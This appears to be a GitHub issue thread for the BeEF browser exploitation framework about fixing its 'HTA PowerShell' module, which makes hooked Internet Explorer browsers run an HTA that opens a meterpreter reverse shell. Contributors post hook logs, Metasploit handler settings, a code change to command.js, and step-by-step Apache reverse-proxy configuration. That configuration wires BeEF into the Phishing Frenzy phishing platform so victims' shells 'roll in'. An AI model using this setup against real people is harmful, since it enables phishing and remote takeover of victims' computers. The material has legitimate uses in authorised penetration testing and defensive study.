HTA_Powershell does not popup in IE

[zeknox]

The HTA popup message does not appear to be working in either version of IE-10 or IE-11. Beef seems to send the proper payload to the browser, but a popup is never shown to the user. Something I'm missing?

My beef instance is fully updated and running ruby 1.9.3

[ 0:53:20][*] Autorun executed[hta_powershell] against Hooked browser [id:1, ip:192.168.1.2, type:IE-11, os:Windows 7]
[ 0:53:24][*] Hooked browser [id:1, ip:192.168.1.2] has been sent instructions from command module [id:1, name:'HTA PowerShell']
[ 0:53:29][*] Hooked browser [id:1, ip:192.168.1.2] has executed instructions from command module [id:1, name:'HTA PowerShell']
[ 0:54:01][*] New Hooked Browser [id:2, ip:192.168.1.2, type:IE-10, os:Windows 7], hooked domain [sub.issds.com:80]
[ 0:54:01][*] Autorun executed[hta_powershell] against Hooked browser [id:2, ip:192.168.1.2, type:IE-10, os:Windows 7]
[ 0:54:06][*] Hooked browser [id:2, ip:192.168.1.2] has been sent instructions from command module [id:2, name:'HTA PowerShell']
[ 0:54:11][*] Hooked browser [id:2, ip:192.168.1.2] has executed instructions from command module [id:2, name:'HTA PowerShell']

[antisnatchor]

I've changed the hta_powershell module in BeEF. Now instead of configuring MSF handler and other options in the module config, you must specify this stuff in extensions/social_engineering/config.yaml

powershell:

the default payload being used is windows/meterpreter/reverse_https

            msf_reverse_handler_host: "127.0.0.1"
            msf_reverse_handler_port: "443"
            powershell_handler_url: "/ps"

[wadealcorn]

Can this be closed?

[antisnatchor]

I will leave this open so I can do some more testing on IE <= 9. On IE 10/11 it works properly for me.

NOTE: beef.http.host (or beef.http.public if you use BeEF behing mod_proxy or equivalent reverse proxy) need to have the public IP. The HTA attack will not work if you leave beef.http.host set to 0.0.0.0.

[7h3kid]

I've run into the same issue as zeknox when using the BeEF HTA attack with phishing-frenzy the attack hangs at the same place for me. When looking at the attack in burp I see that the /ps/hta directory GET request is made for the landing page on port 80 instead of port 3000 where the attack is actually being served. In my testing I get the demos/basic.html demo site on port 3000 to work fine with the HTA attack but when I'm hooking a browser via a landing page running on port 80 the /ps/hta request gets a 404.

[wadealcorn]

Thanks @zeknox. Sounds like something has been hardcoded. @antisnatchor are you able to check?

[antisnatchor]

Are you sure you're following what I said in the comment above?

NOTE: beef.http.host (or beef.http.public if you use BeEF behing mod_proxy or equivalent reverse proxy) need to have the public IP of the machine where you're running BeEF, meaning that if should list only one interface (and not 2/3 as BeEF auto binds to every interface if you leave 0.0.0.0). The HTA attack will not work if you leave beef.http.host set to 0.0.0.0.

Works great for me on IE10 and IE11 and I get a reverse shell immediately.

[antisnatchor]

Another thing to note is that if you are adding BeEF to a landing page served by PhishingFrenzy, it sounds like you're using different origins (as you run on different ports).

Check my phishing-frenzy fork on Github (not merged in the original master yet, find it here: https://github.com/antisnatchor/phishing-frenzy), I'm using mod_proxy with Apache in order to have BeEF listen on 127.0.0.1:8080 and Apache serving phishing pages and also proxying requests to /hook.js (or in this case /ps/hta) to BeEF. This integration is a WIP, and some of the stuff such as the HTA attack is still not public. In this way both the phishing page and the BeEF hook are in fact same-origin, which is better for many attacks.

While you might wait for this to be public, I guess you can just change in modules/social_engineering/hta_powershell/command.js the 'hta_url' variable to:

var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';

That should work although there are different ports involved which is never ideal. Let me know

[antisnatchor]

As expected this IS WORKING with the same approach I mentioned above and implemented in my PF fork.

See reply from Chris Cuevas with detailed steps if you don't want to use my PF fork (this stuff will be merged soon in the PF master anyway):

Here are the additional steps I had to put in place on a Kali linux VM to integrate BeEF and pishing-frenzy using mod_proxy as a reverse proxy. I'm certain this could be done more elegantly but this worked for my immediate needs. I'll also mention the evasion techniques within BeEF work amazing well.

1. Install mod_proxy

apt-get install -y libapache2-mod-proxy-html libxml2-dev

1. enable mod_proxy

a2enmod proxy a2enmod proxy_http a2enmod proxy_ajp a2enmod rewrite a2enmod deflate a2enmod headers a2enmod proxy_balancer a2enmod proxy_connect a2enmod proxy_html

1. config vhost to use mod_proxy (I just modified 1.conf with the following) (the ui portion is optional)

ProxyRequests Off ProxyPreserveHost On

ProxyPass /bh.js http://127.0.0.1:8080/bh.js ProxyPassReverse /bh.js http://127.0.0.1:8080/bh.js ProxyPass /dh http://127.0.0.1:8080/dh ProxyPassReverse /dh http://127.0.0.1:8080/dh ProxyPass /ps http://127.0.0.1:8080/ps ProxyPassReverse /ps http://127.0.0.1:8080/ps ProxyPass /ui http://127.0.0.1:8080/ui ProxyPassReverse /ui http://127.0.0.1:8080/ui

<Location /ui> Order allow,deny Allow from all

<Files /bh.js> Order allow,deny Allow from all

<Files /dh> Order allow,deny Allow from all

<Location /ps> Order allow,deny Allow from all

1. configure beef to be proxy aware (edit beef/config.yaml and change...)

host: "localhost" # Bind to loopback server port: "8080" # Port on 127.0.0.1

public: "www.example.com" # Public site public_port: "80" # Public port

1. change modules/social_engineering/hta_powershell/command.js the 'hta_url' variable to:

var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';

1. I have to hard code the the landing page URL in modules/social_engineering/hta_powershell/module.rb

{'name' => 'domain', 'ui_label' => 'Serving Domain (BeEF server)', 'value' => "http://www.example.com"},

1. kick campaign and watch the shells roll in

[antisnatchor]

This can be closed now, please use this as a reference for now ;-)